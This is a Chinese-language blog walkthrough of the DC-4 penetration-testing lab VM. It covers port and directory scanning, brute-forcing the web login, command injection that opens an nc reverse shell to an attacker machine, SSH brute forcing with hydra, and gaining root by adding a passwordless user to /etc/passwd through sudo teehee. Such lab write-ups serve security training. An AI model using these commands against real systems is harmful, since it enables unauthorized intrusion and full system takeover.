DC-4 打靶渗透

一、信息收集

1、查看靶机MAC地址:

2、查看靶机的ip地址:

nmap 192.168.13.0/24

3、查看靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.13.161

4、访问靶机的80端口:

5、扫描目录:

dirsearch -u "http://192.168.13.161"

6、拼接访问之后发现没有对登录框有用的信息,返回登录框进行测试,发现不存在sql注入,使用弱口令进行尝试,发现账号是admin,密码没有试出来,使用burp进行爆破:

账号密码:admin:happy

成功登录

7、登录 之后,发现有回显,bp抓包进行查看可以执行相关命令:

8、使用bp进行抓包,修改命令为反弹shell的语句:

nc+-e+/bin/bash+192.168.13.128+5555

9、kali开启监听:

10、查看是否反弹到,成功反弹但是用户权限不高:

11、使用命令获得交互式shell:

python -c 'import pty; pty.spawn("/bin/bash")'

二、提权

1、查看用户是否有sudo权限,发现需要输入密码,我们没有密码看不了:

2、查看一下有什么用户可以登录:

root:x:0:0:root:/root:/bin/bash
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

3、有四个用户,分别查看一下目录,发现在jim目录里面有一个.bak文件:

ls /home/jim
ls /home/sam
ls /home/charles

4、查看这个文件,发现是一个密码文件,将它复制到本地:

5、尝试进行ssh爆破用户jim的密码:

hydra -l jim -P /home/kali/passwd.txt ssh://192.168.13.161

得到 jim 账户的密码为 jibril04

6、使用账号密码进行ssh连接:

7、查看这个账户的sudo权限,也没有sudo -l权限:

8、查看 mbox 的内容:

9、查看是一份邮件,由root用户发送给jim的一个邮件,则切换邮件存储路径即 /var/mail 路径下,可以看到存在 www-data 和 jim 两个文件:

10、先查看 jim 文件的内容,www-data只有www-data用户可以访问:

11、发现了账号和密码,切换一下:

账号和密码:charles:^xHhA&hvim0y

12、发现这个用户有sudo权限:

13、创建一个用户,使用teehee追加到/etc/passwd 中:

echo "IAMROOT::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
su IAMROOT

14、查看flag.txt:

  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值